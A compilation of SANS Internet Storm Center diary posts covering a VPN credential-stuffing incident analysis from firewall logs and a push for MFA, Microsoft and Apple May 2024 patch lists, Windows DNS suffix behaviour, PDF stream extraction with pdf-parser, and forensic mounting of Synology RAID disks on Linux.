Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Got MFA? If not, Now is the Time!, (Wed, May 15th)

I had an interesting call from a client recently - they had a number of "net use" and "psexec" commands pop up on a domain controller, all launched via PsExec (thank goodness for a good EDR deployed across the board!!).  The source IP was a VPN session.

Anyway, we almost immediately declared an incident, and the VPN in use - which had just userid/password authentication - was the ingress.  We found a US employee with an active VPN session from Europe (the classic "impossible geography" session) - so the standard "kill the session, deactivate the account, change the password" action ensued.
This was followed by a serious conversation: really, your userid/password protected VPN is only as strong as your weakest password.  And you KNOW that some folks have kept the "Welcome123" password that they got at their last "I forgot my password" helpdesk call.  Also, your userid/password VPN is only as strong as the weakest other site where your folks have used their work credentials.

Anyway, the actions and discussion above were followed by the "who would want to target us?" conversation, so off to the logs we went.

The standard Cisco VPN rejected login syslog message looks like this:

Local4.Info     <fw.ip.add.ress>    %ASA-6-113005: AAA user authentication Rejected : reason = AAA failure : server = <rad.ius.server.ip> : user = ***** : user IP = <att.ack.er.ip>

So, we started by dumping all the Rejected logins for the day (note that this client collects syslog on Windows):

type fw.ip.add.ress.txt | find "Rejected" > aaafail.txt

Now let's see how many events we have in a day:

type aaafail.txt | wc -l
 196500

Let's look at a representative timeslice.  We'll look at:

  • 5pm-6pm (so the time is 17:xx)
  • remove any repeating space characters (tr -s " ")
  • field 24 is the source IP address, extract that with "cut"
  • sort | uniq -c  Give me just uniq addresses, with counts, sorted in descending order
  • After that, I'm just looking (manually) at the attacking hosts with a 10 count or higher
type aaafail.txt | find " 17:" | tr -s " " | cut -d " " -f 24 | sort | uniq -c | sort /r
    670 207.180.247.77
     33 80.94.95.200
     18 45.135.232.63
     15 45.140.17.49
     15 45.140.17.44
     15 45.135.232.98
     14 45.140.17.63
     14 45.140.17.54
     14 45.140.17.47
     14 45.135.232.94
     14 45.135.232.101
     14 45.135.232.100
     14 45.134.26.25
     14 193.143.1.62
     13 91.202.233.3
     13 45.140.17.41
     13 45.135.232.89
     13 45.135.232.26
     13 45.134.26.6
     10 31.41.244.44
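
The find | tr | cut | sort | uniq -c pipeline above can be reproduced portably with a few lines of Python.  This sketch uses collections.Counter and grabs the last whitespace field instead of field 24 (the sample log lines are fabricated in the %ASA-6-113005 shape shown earlier):

```python
from collections import Counter

# Synthetic syslog lines in the %ASA-6-113005 shape shown above
LINES = [
    "May 14 17:01:02 fw %ASA-6-113005: AAA user authentication Rejected : "
    "reason = AAA failure : server = 10.0.0.5 : user = ***** : user IP = 207.180.247.77",
    "May 14 17:02:09 fw %ASA-6-113005: AAA user authentication Rejected : "
    "reason = AAA failure : server = 10.0.0.5 : user = ***** : user IP = 45.140.17.49",
    "May 14 17:03:11 fw %ASA-6-113005: AAA user authentication Rejected : "
    "reason = AAA failure : server = 10.0.0.5 : user = ***** : user IP = 207.180.247.77",
]

def top_sources(lines, hour=" 17:"):
    """Count rejecting source IPs for one hour, like find | tr -s | cut | sort | uniq -c."""
    counts = Counter(
        line.split()[-1]          # in this message format, the source IP is the last field
        for line in lines
        if "Rejected" in line and hour in line
    )
    return counts.most_common()   # descending by count, like sort /r

for ip, count in top_sources(LINES):
    print(f"{count:>5} {ip}")
```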

The first thing we notice is that the first IP stands out, so let's block that.
Now we'll look at those IP's a bit closer using ipinfo, see my story on this utility here: https://isc.sans.edu/diary/Using+Passive+DNS+sources+for+Reconnaissance+and+Enumeration/28596

ipinfo  207.180.247.77
IPINFO OUTPUT
{
  "ip": "207.180.247.77",
  "hostname": "cp.srv.plusdatacenter.com",
  "city": "Frankfurt am Main",
  "region": "Hesse",
  "country": "DE",
  "loc": "50.1155,8.6842",
  "org": "AS51167 Contabo GmbH",
  "postal": "60306",
  "timezone": "Europe/Berlin"
}

Next we note that these "top 20" hosts generated 953 requests in that hour, so this really does look like 1 outlier, plus ~19-20 hosts in a managed cluster.

OK, let's look at those other two subnets that are over-represented in this top 20 list:

ipinfo 45.140.0.0
IPINFO OUTPUT
{
  "ip": "45.140.0.0",
  "city": "Sandnes",
  "region": "Rogaland",
  "country": "NO",
  "loc": "58.8524,5.7352",
  "org": "AS201454 UPHEADS AS",
  "postal": "4301",
  "timezone": "Europe/Oslo"
}

ipinfo 45.135.0.0
IPINFO OUTPUT
{
  "ip": "45.135.0.0",
  "city": "Kyiv",
  "region": "Kyiv City",
  "country": "UA",
  "loc": "50.4547,30.5238",
  "org": "AS208467 MagicService LLC",
  "postal": "03027",
  "timezone": "Europe/Kyiv"
}

Note that we're 3 searches in and we still haven't found any of the traditional "boogeymen".  No Russia, no DPRK, no Iran (yet).

So, keeping in mind that we're just playing with part of the attack, I started blocking subnets, ASN's, and countries.

We blocked the subnets above, and the attack shifted within seconds to ramp up from a Cloud Service Provider in Germany.  We blocked their address space, and it shifted to a CSP in France.  Two more CSP's later, and we finally cut the "top 20" volumes down, and our high volume hosts were down to 5 hosts in Russia.
Blocking Russia shifted the attack to India, then South America.  

You see the patterns here, and have hopefully drawn the same conclusions.

The attackers have pre-built "malicious assets" wherever they can spin up legitimate free or low-cost cloud hosts.  The attacker is not attacking from their own IP space or even their own country.  The entire thing is automated - over the course of that day we saw malicious attacks from roughly 1100 IP addresses as we blocked various subnets and ASNs for various (mostly legitimate) cloud providers.

Looking at the other half of the equation, this attacker in particular was using account names that were not related to the organization being attacked - the userids being used were a mix of all formats, plus favourites such as admin, administrator and root.  So it looks like they were using standard password dumps as input.  I'd have been more concerned - and wouldn't have played around so much - if the attacker had harvested user account info from LinkedIn and similar sources.  If the credential stuffing attack contains mostly legitimate people's names, the chances of success are WAY higher - they're most likely combining legit names with password dump data that matches those names.  Normally we see this sort of thing with red team or more targeted malicious activity, where the per-company costs are a bit higher, but because things are targeted, the attack tends to succeed sooner.  In that situation we'd have likely shut down the VPN and implemented MFA offline.  Password dump files such as this are easy to come by, and are generally free - though you can certainly purchase targeted lists, or even purchase access to particular companies from "Access as a Service" companies in the criminal supply chain.  Don't believe folks who use phrases like "the dark web" when describing these (though that does exist too).

Needless to say, we did a crash migration to MFA for their VPN - we had them cut over within a couple of hours of making the decision.  Since their email was already using MFA, this was free and no fuss at all (thanks Microsoft!) - the MFA prompts were already familiar to the user base.

Lessons learned?

  • Nobody is targeting you - they are targeting everyone that hasn't implemented MFA.  Or possibly even the MFA-protected sites, since it's tough to tell either way until you get to the MFA prompt.
  • Also from the connection volumes, the attackers were very careful not to lock out accounts.  Each IP address has roughly 15 attempts max in an hour, so that's once every ~4 minutes.
  • With just one hit every 4 minutes, just this one example cluster has gobs of capacity to scale up and target hundreds of other organizations.
  • They are targeting VPNs.  None of this "pivot through a website" gymnastics, then "pivot out of the DMZ" heartache, they're after the front door and full access to the network.  Though they're still targeting websites too.  Anything with a login prompt is fair game.
  • This entire thing is automated.  As I shut down each cluster of addresses, a new cluster would pop up elsewhere in the world within seconds.  The old cluster is still chugging along against its other targets.
  • The cluster of hosts at any given time likely are not the actual attacking hosts.  Remember, the attackers have a significant application and data management challenge here.  They need to centrally store the "prospective credentials" and actual compromised credentials, as well as keep track of hundreds of targets and where each target is in the campaign.  So these clusters of hosts are likely proxy servers being used by a central cluster of actual servers backed by a database and a decent application, or at least a pretty good script.  This means my estimate of hundreds of targets is likely on the light side.
  • Geo-blocking is getting less useful over time - while we still do see attacks from the countries you might expect, anyone who is any good has automation to source their attack from almost anywhere, and once they see you blocking them, from anywhere else.  This argues further for central control and data management, since I'd bet only our attacker's proxy servers were jumping from datacenter to datacenter - there's no profit in moving the attack against any given organization unless you have to.  This means claims like "we are being targeted by country X" are very difficult to support with attribution (this is not new).
  • The "foreign influence attacks" headlines (check the media lately in Canada) aren't worth the ink - OF COURSE the attack is coming from outside of your country.  Nobody is going to mount an attack where their local constabulary can roll up and knock down their door.  These folks take great pains (usually) to operate in countries that their government doesn't play so nice with.  Good luck finding the actual servers though, unless you compromise a proxy host that is (this may not be legal in your jurisdiction, this was NOT advice).
  • Attack styles do tend to come in waves.  The classic "drop powershell to download the malware" email attacks have declined somewhat since Microsoft blocked most scripting in Office.  We had "whale phishing" attacks that drove MFA for email a couple of years back.  In more recent times we've seen attacks against vulnerabilities in everyone's edge appliances (firewalls, VPNs, file transfer, terminal service proxies etc).  Credential stuffing against userid/passwords seems to be seeing an uptick lately.  But guess what - they're all in play, all the time.  None of these are new, and just because one hits the headlines doesn't mean the others are not just as active as they were last month or last year.  Credential stuffing attacks very much like this one have been a part of the landscape since the 90's (or before) - they're just too cheap and easy to set and forget for the attacker, especially these days.

The "moral of the story"?

  • If you haven't implemented MFA, now is the time.
  • If you have just userid/password protection on your VPN and are not compromised, you likely will be soon.
  • If you think you're not compromised, that doesn't mean that you're not.  The attacker in this incident is likely not the only one, and is likely not even the only one from today.  They'll likely sell any compromised credentials to the real attacker that's in it for extortion of one kind or another.  That real attacker likely is purchasing the credentials from one provider, the malware from another and so on - the bad guys are just as much focused on "As A Service" as regular IT teams. In fact, the attackers are regular IT teams, just (mostly) operating outside of their target jurisdictions.
  • So you might be compromised a good long time before you see anything obvious in your daily operations that will tell you that you have a problem.
  • If you are still running simple antivirus, you need to look at better options.  
  • If you don't have a SIEM that will alert you to attacks that show up in your logs, then you won't know about your attacks until they succeed.


Anyway, this story went on longer than I had planned.  Long story short, if you have anything (VPN, Website, SSH, application, whatever) facing the internet that has a simple userid / password login, then you should probably rethink that decision in 2024.

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Microsoft May 2024 Patch Tuesday, (Tue, May 14th)

This month we got patches for 67 vulnerabilities. Of these, one is critical, and one is already being exploited according to Microsoft.

The critical vulnerability is a Remote Code Execution (RCE) affecting Microsoft SharePoint Server (CVE-2024-30044). According to the advisory, an authenticated attacker with Site Owner permissions or higher could upload a specially crafted file to the targeted SharePoint Server and craft specialized API requests to trigger deserialization of the file's parameters. This would enable the attacker to perform remote code execution in the context of the SharePoint Server. The CVSS for the vulnerability is 8.8.

The zero-day vulnerability is an elevation of privilege in the Windows DWM (Desktop Window Manager) Core Library (CVE-2024-30051). According to the advisory, an attacker who successfully exploited this vulnerability could gain SYSTEM privileges. The CVSS for the vulnerability is 7.8.

There is an important vulnerability affecting MinGit software (CVE-2024-32002), used by Microsoft Visual Studio, caused by an improper limitation of a pathname to a restricted directory ('Path Traversal') making it susceptible to Remote Code Execution. It is being documented in the Security Update Guide to announce that the latest builds of Visual Studio are no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information. The CVSS for the vulnerability is 9.0 – the highest for this month.

See the full list of patches:

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET and Visual Studio Remote Code Execution Vulnerability
%%cve:2024-30045%% No No - - Important 6.3 5.5
Azure Migrate Cross-Site Scripting Vulnerability
%%cve:2024-30053%% No No - - Important 6.5 5.9
CVE-2024-32002 Recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution
%%cve:2024-32002%% No No - - Important 9.0 7.8
Chromium: CVE-2024-4331 Use after free in Picture In Picture
%%cve:2024-4331%% No No - - -    
Chromium: CVE-2024-4368 Use after free in Dawn
%%cve:2024-4368%% No No - - -    
Chromium: CVE-2024-4558 Use after free in ANGLE
%%cve:2024-4558%% No No - - -    
Chromium: CVE-2024-4559 Heap buffer overflow in WebAudio
%%cve:2024-4559%% No No - - -    
Chromium: CVE-2024-4671 Use after free in Visuals
%%cve:2024-4671%% No No - - -    
DHCP Server Service Denial of Service Vulnerability
%%cve:2024-30019%% No No - - Important 6.5 5.7
Dynamics 365 Customer Insights Spoofing Vulnerability
%%cve:2024-30047%% No No - - Important 7.6 6.6
%%cve:2024-30048%% No No - - Important 7.6 6.6
GitHub: CVE-2024-32004 Remote Code Execution while cloning special-crafted local repositories
%%cve:2024-32004%% No No - - Important 8.1 7.1
Microsoft Bing Search Spoofing Vulnerability
%%cve:2024-30041%% No No - - Important 5.4 4.7
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2024-30007%% No No - - Important 8.8 7.7
Microsoft Edge (Chromium-based) Spoofing Vulnerability
%%cve:2024-30055%% No No Less Likely Less Likely Low 5.4 4.7
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2024-30042%% No No - - Important 7.8 6.8
Microsoft Intune for Android Mobile Application Management Tampering Vulnerability
%%cve:2024-30059%% No No - - Important 6.1 5.8
Microsoft PLUGScheduler Scheduled Task Elevation of Privilege Vulnerability
%%cve:2024-26238%% No No - - Important 7.8 6.8
Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability
%%cve:2024-30054%% No No - - Important 6.5 5.7
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2024-30043%% No No - - Important 6.5 5.7
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2024-30044%% No No - - Critical 8.8 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-30006%% No No - - Important 8.8 7.7
Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
%%cve:2024-29994%% No No - - Important 7.8 6.8
NTFS Elevation of Privilege Vulnerability
%%cve:2024-30027%% No No - - Important 7.8 6.8
Visual Studio Denial of Service Vulnerability
%%cve:2024-30046%% Yes No - - Important 5.9 5.2
Win32k Elevation of Privilege Vulnerability
%%cve:2024-30028%% No No - - Important 7.8 6.8
%%cve:2024-30030%% No No - - Important 7.8 6.8
%%cve:2024-30038%% No No - - Important 7.8 6.8
Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
%%cve:2024-30031%% No No - - Important 7.8 6.8
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
%%cve:2024-30034%% No No - - Important 5.5 4.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2024-29996%% No No - - Important 7.8 6.8
%%cve:2024-30025%% No No - - Important 7.8 6.8
%%cve:2024-30037%% No No - - Important 7.5 6.5
Windows Cryptographic Services Information Disclosure Vulnerability
%%cve:2024-30016%% No No - - Important 5.5 4.8
Windows Cryptographic Services Remote Code Execution Vulnerability
%%cve:2024-30020%% No No - - Important 8.1 7.1
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2024-30032%% No No - - Important 7.8 6.8
%%cve:2024-30035%% No No - - Important 7.8 6.8
%%cve:2024-30051%% Yes Yes - - Important 7.8 7.2
Windows DWM Core Library Information Disclosure Vulnerability
%%cve:2024-30008%% No No - - Important 5.5 4.8
Windows Deployment Services Information Disclosure Vulnerability
%%cve:2024-30036%% No No - - Important 6.5 5.7
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-30011%% No No - - Important 6.5 5.7
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2024-30010%% No No - - Important 8.8 7.7
%%cve:2024-30017%% No No - - Important 8.8 7.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-30018%% No No - - Important 7.8 6.8
Windows MSHTML Platform Security Feature Bypass Vulnerability
%%cve:2024-30040%% No Yes - - Important 8.8 8.2
Windows Mark of the Web Security Feature Bypass Vulnerability
%%cve:2024-30050%% No No - - Moderate 5.4 5.0
Windows Mobile Broadband Driver Remote Code Execution Vulnerability
%%cve:2024-29997%% No No - - Important 6.8 5.9
%%cve:2024-29998%% No No - - Important 6.8 5.9
%%cve:2024-29999%% No No - - Important 6.8 5.9
%%cve:2024-30000%% No No - - Important 6.8 5.9
%%cve:2024-30001%% No No - - Important 6.8 5.9
%%cve:2024-30002%% No No - - Important 6.8 5.9
%%cve:2024-30003%% No No - - Important 6.8 5.9
%%cve:2024-30004%% No No - - Important 6.8 5.9
%%cve:2024-30005%% No No - - Important 6.8 5.9
%%cve:2024-30012%% No No - - Important 6.8 5.9
%%cve:2024-30021%% No No - - Important 6.8 5.9
Windows Remote Access Connection Manager Information Disclosure Vulnerability
%%cve:2024-30039%% No No - - Important 5.5 4.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-30009%% No No - - Important 8.8 7.7
%%cve:2024-30014%% No No - - Important 7.5 6.6
%%cve:2024-30015%% No No - - Important 7.5 6.5
%%cve:2024-30022%% No No - - Important 7.5 6.5
%%cve:2024-30023%% No No - - Important 7.5 6.5
%%cve:2024-30024%% No No - - Important 7.5 6.5
%%cve:2024-30029%% No No - - Important 7.5 6.5
Windows Search Service Elevation of Privilege Vulnerability
%%cve:2024-30033%% No No - - Important 7.0 6.1
Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
%%cve:2024-30049%% No No - - Important 7.8 6.8

 

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches Everything: macOS, iOS, iPadOS, watchOS, tvOS updated., (Tue, May 14th)

Apple today released updates for its various operating systems. The updates cover iOS, iPadOS, macOS, watchOS and tvOS. A standalone update for Safari was released for older versions of macOS. One already exploited vulnerability, CVE-2024-23296, is patched for older versions of macOS and iOS. In March, Apple patched this vulnerability for more recent versions of iOS and macOS.

 

Safari 17.5 iOS 17.5 and iPadOS 17.5 iOS 16.7.8 and iPadOS 16.7.8 macOS Sonoma 14.5 macOS Ventura 13.6.7 macOS Monterey 12.7.5 watchOS 10.5 tvOS 17.5
CVE-2024-27834 [moderate] WebKit
The issue was addressed with improved checks.
An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication
x x   x     x x
CVE-2024-27804 [important] AppleAVD
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
  x   x     x x
CVE-2024-27816 [moderate] RemoteViewServices
A logic issue was addressed with improved checks.
An attacker may be able to access user data
  x   x     x x
CVE-2024-27841 [important] AVEVideoEncoder
The issue was addressed with improved memory handling.
An app may be able to disclose kernel memory
  x   x        
CVE-2024-27839 [moderate] Find My
A privacy issue was addressed by moving sensitive data to a more secure location.
A malicious application may be able to determine a user's current location
  x            
CVE-2024-27818 [moderate] Kernel
The issue was addressed with improved memory handling.
An attacker may be able to cause unexpected app termination or arbitrary code execution
  x   x        
CVE-2023-42893 [moderate] Libsystem
A permissions issue was addressed by removing vulnerable code and adding additional checks.
An app may be able to access protected user data
  x   x        
CVE-2024-27810 [important] Maps
A path handling issue was addressed with improved validation.
An app may be able to read sensitive location information
  x   x     x x
CVE-2024-27852 [moderate] MarketplaceKit
A privacy issue was addressed with improved client ID handling for alternative app marketplaces.
A maliciously crafted webpage may be able to distribute a script that tracks users on other webpages
  x            
CVE-2024-27835 [moderate] Notes
This issue was addressed through improved state management.
An attacker with physical access to an iOS device may be able to access notes from the lock screen
  x            
CVE-2024-27803 [moderate] Screenshots
A permissions issue was addressed with improved validation.
An attacker with physical access may be able to share items from the lock screen
  x            
CVE-2024-27821 [moderate] Shortcuts
A path handling issue was addressed with improved validation.
A shortcut may output sensitive user data without consent
  x   x     x  
CVE-2024-27847 [important] Sync Services
This issue was addressed with improved checks
An app may be able to bypass Privacy preferences
  x   x        
CVE-2024-27796 [moderate] Voice Control
The issue was addressed with improved checks.
An attacker may be able to elevate privileges
  x   x        
CVE-2024-27789 [important] Foundation
A logic issue was addressed with improved checks.
An app may be able to access user-sensitive data
    x   x x    
CVE-2024-23296 [moderate] *** EXPLOITED *** RTKit
A memory corruption issue was addressed with improved validation.
An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.
    x   x      
CVE-2024-27837 [moderate] AppleMobileFileIntegrity
A downgrade issue was addressed with additional code-signing restrictions.
A local attacker may gain access to Keychain items
      x        
CVE-2024-27825 [moderate] AppleMobileFileIntegrity
A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions.
An app may be able to bypass certain Privacy preferences
      x        
CVE-2024-27829 [moderate] AppleVA
The issue was addressed with improved memory handling.
Processing a file may lead to unexpected app termination or arbitrary code execution
      x        
CVE-2024-23236 [moderate] CFNetwork
A correctness issue was addressed with improved checks.
An app may be able to read arbitrary files
      x        
CVE-2024-27827 [moderate] Finder
This issue was addressed through improved state management.
An app may be able to read arbitrary files
      x        
CVE-2024-27822 [important] PackageKit
A logic issue was addressed with improved restrictions.
An app may be able to gain root privileges
      x        
CVE-2024-27824 [moderate] PackageKit
This issue was addressed by removing the vulnerable code.
An app may be able to elevate privileges
      x        
CVE-2024-27813 [moderate] PrintCenter
The issue was addressed with improved checks.
An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges
      x        
CVE-2024-27843 [moderate] SharedFileList
A logic issue was addressed with improved checks.
An app may be able to elevate privileges
      x        
CVE-2024-27798 [moderate] StorageKit
An authorization issue was addressed with improved state management.
An attacker may be able to elevate privileges
      x        
CVE-2024-27842 [important] udf
The issue was addressed with improved checks.
An app may be able to execute arbitrary code with kernel privileges
      x        
CVE-2023-42861 [moderate] Login Window
A logic issue was addressed with improved state management.
An attacker with knowledge of a standard user's credentials can unlock another standard user's locked screen on the same Mac
        x      
CVE-2024-23229 [moderate] Find My
This issue was addressed with improved redaction of sensitive information.
A malicious application may be able to access Find My data
          x    

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

DNS Suffixes on Windows, (Sun, May 12th)

I was asked if I could provide more details on the following sentence from my diary entry "nslookup's Debug Options":

     (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com.", I do that to prevent Windows from adding suffixes)

A DNS suffix is a configuration of the Windows DNS client (set locally, via DHCP, ...) that makes it append suffixes when doing domain lookups.

For example, if a DNS suffix "local" is configured, then Windows' DNS client will not only do a DNS lookup for example.com, but also for example.com.local.

As an example, let me configure mylocalnetwork as a suffix on a Windows machine:

With DNS suffix mylocalnetwork configured, nslookup will use this suffix. For example, when I perform a lookup for "example.com", nslookup will also do a lookup for "example.com.mylocalnetwork".

I can show this with nslookup's debug option d2:

You can see in these screenshots DNS type A and AAAA resolutions for example.com.mylocalnetwork and example.com.

One of the ideas behind DNS suffixes is to reduce typing. If you have a NAS, for example, named mynas, you can just access it with https://mynas/login. No need to type the fully qualified domain name (FQDN) https://mynas.mylocalnetwork/login.

Notice that the suffix also applies for AAAA queries, while in the screenshots above I only configured it for IPv4. That's because the DNS suffix setting applies both to IPv4 and IPv6:

Before I show the results with "example.com." (notice the dot character at the end), let me show how I can summarize the lookups by grepping for "example" (findstr):

If I terminate my DNS query with a dot character (.), suffixes will not be appended:

Notice that there are no resolutions for mylocalnetwork in this last example. That's because the trailing dot instructs Windows' DNS client to start resolving from the DNS root zone.

A domain name consists of domain labels separated by dots:

If you are adding a trailing dot, you are actually adding an empty domain label:

The empty label represents the DNS root zone, and no suffixes are appended to the DNS root zone, as it is the top-level (root) DNS zone.
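
The suffix behavior described above can be modeled in a few lines.  This is a simplified sketch of candidate generation (real resolvers also order candidates based on label counts - this is not Windows' actual logic):

```python
def lookup_candidates(name: str, suffixes: list[str]) -> list[str]:
    """Names a suffix-aware resolver would try, in a simplified model."""
    if name.endswith("."):
        # Trailing dot = explicit empty root label: resolve as-is, no suffixes.
        return [name]
    return [name] + [f"{name}.{suffix}" for suffix in suffixes]

print(lookup_candidates("example.com", ["mylocalnetwork"]))
print(lookup_candidates("example.com.", ["mylocalnetwork"]))
```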

A small tip if you want to restrict nslookup's resolutions to A records, for example. There is an option for that.

If you use nslookup's help option /?, you will see that you can provide options, but the actual options are not listed:

To see the available options, start nslookup, and then type "?" at its prompt, like this:

Now you can see that option "type" allows you to specify which type of records to query. Here is an example for A records:

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing PDF Streams, (Thu, May 9th)

Occasionally, Xavier and Jim will relay specific questions from students about my tools when they teach FOR610: Reverse-Engineering Malware.

Recently, a student wanted to know if my pdf-parser.py tool can extract all the PDF streams with a single command.

Since version 0.7.9, it can.

A stream is (binary) data, optionally part of an object, and can be compressed or otherwise transformed. To view a single stream with pdf-parser, one selects the object of interest and uses option -f to apply the filters (like zlib decompression) to the stream:

 
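For streams compressed with /FlateDecode, the filter being applied amounts to zlib decompression. A minimal sketch of that underlying operation (illustrative only, not pdf-parser's actual code):

```python
import zlib

# Simulate a FlateDecode-compressed content stream and "apply the filter".
raw = zlib.compress(b"BT /F1 12 Tf (Hello) Tj ET")  # sample page content stream
decoded = zlib.decompress(raw)
print(decoded.decode())  # BT /F1 12 Tf (Hello) Tj ET
```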

I added a feature that is present in several of my tools, like oledump.py and zipdump.py: extract all of the "stored items" into a single JSON document.

When you use pdf-parser's option -j (--jsonoutput), all objects with a stream will have their raw data (i.e., unfiltered) extracted and put into a JSON document that is sent to stdout:

To get the filtered (i.e., decompressed) data, use option -f together with option -j:

What can you do with this JSON data? It depends on what your goals are. I have several tools that can take this JSON data as input, like file-magic.py and strings.py.

Here I use file-magic.py to identify the type of each raw data stream:

From this we can learn, for example, that object 143's stream contains a JPEG image.

And here I use file-magic.py to identify the type of each filtered data stream:

From this we can learn, for example, that object 881's stream contains a compressed TrueType Font file.

What if you want to write all stream data to disk, in individual files, for further analysis (that's what the student wanted to do, I guess)?

Then you can use my tool myjson-filter.py. It's a tool designed to filter JSON data produced by my tools, but it can also write items to disk.

When you use option -l, this tool will just produce a listing of the items contained in the JSON data:

And you can use option -W to write the streams to disk. -W takes a value that specifies the naming convention to be used when writing files to disk. vir will write items to disk with their sanitized name and extension .vir:

hashvir will write items to disk with their sha256 value as name and extension .vir:
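The hashvir naming convention is easy to reproduce if you need it elsewhere; a sketch of the scheme (my own illustration, not myjson-filter.py's actual code):

```python
import hashlib

def hashvir_name(data):
    # Name a sample after the SHA-256 digest of its content, extension .vir
    return hashlib.sha256(data).hexdigest() + ".vir"

print(hashvir_name(b"stream data"))
```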

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing Synology Disks on Linux, (Wed, May 8th)

Synology NAS solutions are popular devices. They are also used in many organizations. Their product range goes from small boxes with two disks (I’m not sure they still sell a single-disk enclosure today) up to monsters, rackable with plenty of disks. They offer multiple disk management options but, like most appliances, rely heavily on open-source software. For example, there are no expensive hardware RAID controllers in the box: they use the good old “MD” (“multiple devices”) technology, managed with the well-known mdadm tool[1]. Synology NAS devices run a Linux distribution called DSM. This operating system ships plenty of third-party tools but lacks pure forensics tools.

In a recent investigation, I had to investigate a NAS that was involved in a ransomware attack. Many files (backups) were deleted: the attacker simply deleted some shared folders. The device had two drives configured in RAID0 (not the best choice, I know, but they lacked storage capacity). The idea was to mount the file system (or at least have the block device) on a Linux host and run forensic tools, for example, photorec.

In such a situation, the biggest challenge is to connect all the drives to the analysis host! Here, I had only two drives, but imagine facing a bigger model with 5+ disks. In my case, I used two USB-C/SATA adapters to connect the drives. Besides the software RAID, Synology volumes also rely on LVM2 (“Logical Volume Manager”)[2]. In most distributions, the packages mdadm and lvm2 are available (for example on the SIFT Workstation). Otherwise, just install them:

# apt install mdadm lvm2

Once you connect the disks to the analysis host (tip: label them so you can put them back in the right order), verify that they are properly detected:

# lsblk
NAME    MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda       8:0    0 465.8G  0 disk
|-sda1    8:1    0 464.8G  0 part  /
|-sda2    8:2    0     1K  0 part
`-sda5    8:5    0   975M  0 part  [SWAP]
sdb       8:16   0   3.6T  0 disk
|-sdb1    8:17   0     8G  0 part
|-sdb2    8:18   0     2G  0 part
`-sdb3    8:19   0   3.6T  0 part
sdc       8:32   0   3.6T  0 disk
|-sdc1    8:33   0   2.4G  0 part
|-sdc2    8:34   0     2G  0 part
`-sdc3    8:35   0   3.6T  0 part
sr0      11:0    1  1024M  0 rom

"sdb3" and "sdc3" are the NAS partitions used to store data (2 x 4TB in RAID0). The good news is that the kernel will detect that these disks are part of a software RAID! You just need to rescan them and "re-assemble" the RAID:

# mdadm --assemble --readonly --scan --force --run 

Then, your data should be available via a /dev/md? device:

# cat /proc/mdstat
Personalities : [raid0]
md0 : active (read-only) raid0 sdb3[0] sdc3[1]
      7792588416 blocks super 1.2 64k chunks

unused devices: <none>
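If you have to process many devices, the same information can be pulled out of /proc/mdstat programmatically. A small sketch, assuming the typical mdstat layout (not a full parser):

```python
import re

def md_arrays(mdstat):
    """Parse /proc/mdstat content into {array: [member devices]}."""
    arrays = {}
    for line in mdstat.splitlines():
        m = re.match(r"(md\d+)\s*:\s*(.*)", line)
        if m:
            # member devices appear as tokens like "sdb3[0]"
            arrays[m.group(1)] = re.findall(r"(\w+)\[\d+\]", m.group(2))
    return arrays

sample = """md0 : active (read-only) raid0 sdb3[0] sdc3[1]
      7792588416 blocks super 1.2 64k chunks"""
print(md_arrays(sample))  # {'md0': ['sdb3', 'sdc3']}
```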

The next step is to detect how data are managed by the NAS. Synology provides a technology called SHR[3] that uses LVM:

# lvdisplay
  WARNING: PV /dev/md0 in VG vg1 is using an old PV header, modify the VG to update.
  --- Logical volume ---
  LV Path                /dev/vg1/syno_vg_reserved_area
  LV Name                syno_vg_reserved_area
  VG Name                vg1
  LV UUID                08g9nN-Etde-JFN9-tn3D-JPHS-pyoC-LkVZAI
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                12.00 MiB
  Current LE             3
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

  --- Logical volume ---
  LV Path                /dev/vg1/volume_1
  LV Name                volume_1
  VG Name                vg1
  LV UUID                fgjC0Y-mvx5-J5Qd-Us2k-Ppaz-KG5X-tgLxaX
